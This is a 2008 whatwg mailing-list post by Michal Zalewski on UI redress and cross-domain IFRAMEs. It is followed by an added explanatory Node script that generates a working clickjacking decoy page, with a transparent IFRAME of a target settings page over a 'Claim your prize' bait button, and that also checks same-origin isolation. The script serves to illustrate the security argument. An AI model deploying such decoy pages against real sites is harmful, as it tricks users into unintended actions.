[whatwg] Dealing with UI redress vulnerabilities inherent to the current web

Michal Zalewski lcamtuf at dione.cc
Fri Sep 26 09:43:41 PDT 2008


On Fri, 26 Sep 2008, Elliotte Harold wrote:

> Absolutely false. The media simply needs to be served from the same host 
> the blog itself is. This is how almost all the media in my blogs works 
> today. What little content comes from a 3rd party site in my blogs 
> (mostly from laziness) could easily be moved to the sites that serve the 
> blogs.

I kinda assumed this suggestion was tongue-in-cheek, but if not - banning 
cross-domain IFRAMEs to fix one flaw, without providing viable methods for 
sandboxing untrusted same-origin content, would leave web developers with 
no tools to deal with quite a few classes of major security issues.

/mz
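Both halves of the trade-off Michal describes, as an added example that is not code from the thread or from any of its participants: a cross-domain IFRAME is the vector for UI redress (a transparent frame of the target layered over a decoy so the victim's click lands on the target's control), and the same cross-origin boundary is what isolates untrusted content from the embedding site. The script below runs under Node; every URL, label and coordinate in it is made up for illustration, and the `buildRedressPage`, `computeOverlay`, `isSameOrigin` and `framingIsolates` names are this example's own.

```javascript
// Added example, not from the whatwg thread. Models a UI redress decoy page
// and the same-origin check behind IFRAME-based isolation. Plain Node, no DOM;
// all URLs and coordinates are hypothetical.

// Minimal escaping so attacker-chosen strings cannot break out of the
// generated markup (the decoy page is itself HTML).
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
  })[c]);
}

// Where to position the transparent IFRAME so that the target's sensitive
// control (at control.x/y in the target's own layout, control.w/h in size)
// sits exactly under the visible decoy button drawn at decoy.x/y.
function computeOverlay(control, decoy) {
  return {
    left: decoy.x - control.x,
    top: decoy.y - control.y,
    width: control.w,
    height: control.h,
  };
}

// Build the attacker's page: a visible decoy button plus a cross-domain IFRAME
// of the target page stacked above it at zero opacity. The target page is not
// modified at all, which is why the target site cannot detect this from its
// own markup; only the framing relationship reveals it.
function buildRedressPage({ targetUrl, decoyLabel, control, decoy }) {
  const o = computeOverlay(control, decoy);
  return [
    "<!doctype html>",
    "<html><body>",
    `<button style="position:absolute;left:${decoy.x}px;top:${decoy.y}px;` +
      `width:${o.width}px;height:${o.height}px;z-index:1">${escapeHtml(decoyLabel)}</button>`,
    `<iframe src="${escapeHtml(targetUrl)}" scrolling="no" ` +
      `style="position:absolute;left:${o.left}px;top:${o.top}px;` +
      `width:1200px;height:900px;border:0;opacity:0;z-index:2"></iframe>`,
    "</body></html>",
  ].join("\n");
}

// Same-origin policy as browsers apply it: scheme, host and port must all
// match (URL normalises a default port to ""). A document from a different
// origin inside an IFRAME cannot read or script the embedding document.
function isSameOrigin(a, b) {
  const ua = new URL(a);
  const ub = new URL(b);
  return ua.protocol === ub.protocol && ua.hostname === ub.hostname && ua.port === ub.port;
}

// Given where untrusted (user-supplied) HTML is served from, report whether
// framing it from the main site actually isolates it. Served from the site's
// own origin, its scripts run as the site; served from a separate domain,
// the origin boundary keeps it out of the site's DOM and cookies.
function framingIsolates(siteUrl, untrustedContentUrl) {
  return !isSameOrigin(siteUrl, untrustedContentUrl);
}

// Stand-alone run: emit a decoy page for a hypothetical target control.
const demoPage = buildRedressPage({
  targetUrl: "https://target.example/settings",   // hypothetical
  decoyLabel: "Claim your prize",
  control: { x: 300, y: 400, w: 120, h: 30 },     // target's real button
  decoy: { x: 40, y: 40 },                         // where the bait is drawn
});
console.log(demoPage);
```

Two observations follow from running it. The decoy page never touches the target's markup, so "serve everything from the same host" does nothing for the target of a redress attack; and `framingIsolates` returns false as soon as user-supplied HTML shares the site's origin, which is the sandboxing gap Michal says a blanket ban on cross-domain IFRAMEs would leave open.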
